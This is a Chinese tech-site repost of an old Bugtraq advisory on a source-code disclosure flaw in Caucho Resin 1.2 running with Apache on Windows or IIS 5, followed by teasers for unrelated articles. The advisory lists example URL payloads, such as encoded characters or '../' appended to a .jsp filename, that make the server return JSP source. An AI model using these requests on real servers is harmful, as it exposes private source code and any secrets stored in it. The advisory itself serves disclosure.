Resin 1.2 重要源代码暴露漏洞

2016-01-29 12:47 45 1 收藏

Resin 1.2 重要源代码暴露漏洞,Resin 1.2 重要源代码暴露漏洞

【 tulaoshi.com - Java 】

bugtraq id 1986
class Input Validation Error
cve GENERIC-MAP-NOMATCH
remote Yes
local Yes
published November 23, 2000
updated November 23, 2000
vulnerable Caucho Technology Resin 1.2
- Microsoft IIS 5.0
+ Microsoft Windows NT 2000
- Apache Group Apache 1.3.6win32

Apache (Win32):
..
%2e..
%81
%82
Example: http://target/filename.jsp%81

Resin Web Server:
../
Example: http://target/filename.jsp../

IIS 5 requesting the URL encoded with ASCII:
'%2' instead of '.'
Example: http://target/filename%2ejsp

来源:http://www.tulaoshi.com/n/20160129/1487553.html

上一篇： Allair JRUN 非法读取 WEB-INF 漏洞
下一篇： Flash5 画任意直线教程

看过《Resin 1.2 重要源代码暴露漏洞》的人还看了以下文章更多>>

AJAX 请求源代码

标签： Web开发

AJAXSuggest源代码的实例下面的源代码属于上一节的AJAX实例。您可以拷贝粘贴这些代码，然后亲自测试一下。 AJAXHTML页面这是HTML页面。它包含了一个简单的HTML表单，以及一个指向JavaScript的链接。 html head scriptsrc="clienthint.js"/script /head bo...

解密ASP源代码

标签： ASP

从网上兴致冲冲地下载了ASP源代码,准备学习研究的时候.一打开文件,天书般的加密代码.很让人郁闷吧 :( 在网上是找到了解密的方法,得一个文件挨一个文件地打开,复制,粘贴,解密,再复制,再粘贴,再保存...... 如果一个ASP程序有几百个文件??? 解决办法来了.. decode.asp <% @Language="JavaScript" % <% /* *-----------...

CASSINI源代码分析(4)

因为connection对象仅仅跟host对象相关，且处理一个套接字，所以其数据成员仅有：private Host _host; //指向宿主对象 private Socket _socket; //当前套接字我们知道host调用且仅了conn.ProcessOneRequest();方法，所以我们首先要找到此方法（coneetion很多方法，我们先看看主要的）： public void ProcessOneRequest() { // wait for at leas...

清空代码防止查看源代码的js代码

标签： Web开发

这招算是目前网上公布的防止查看源代码的方法中最好的了，当然了，要看还是办法的，比如在地址栏中输入"javascript:alert(document.documentElement.outerHTML);"。 [Ctrl+A 全选注:如需引入外部Js需刷新才能执行]

源代码解析——初探 AjaxTags

标签： Web开发

AjaxTags项目是在现有的Struts HTML标记库的基础上，添加对AJAX支持。 AjaxTags改写了Struts标签类org.apache.struts.taglib.html.FormTag和org.apache.struts.taglib.html.BaseHandlerTag，并使用Struts的plugin技术，使得Struts提供了对AJAX的支持。以下是jsp中简单的示例： html:form action="example1" ajaxRef="example1"> ...

查看更多精彩>>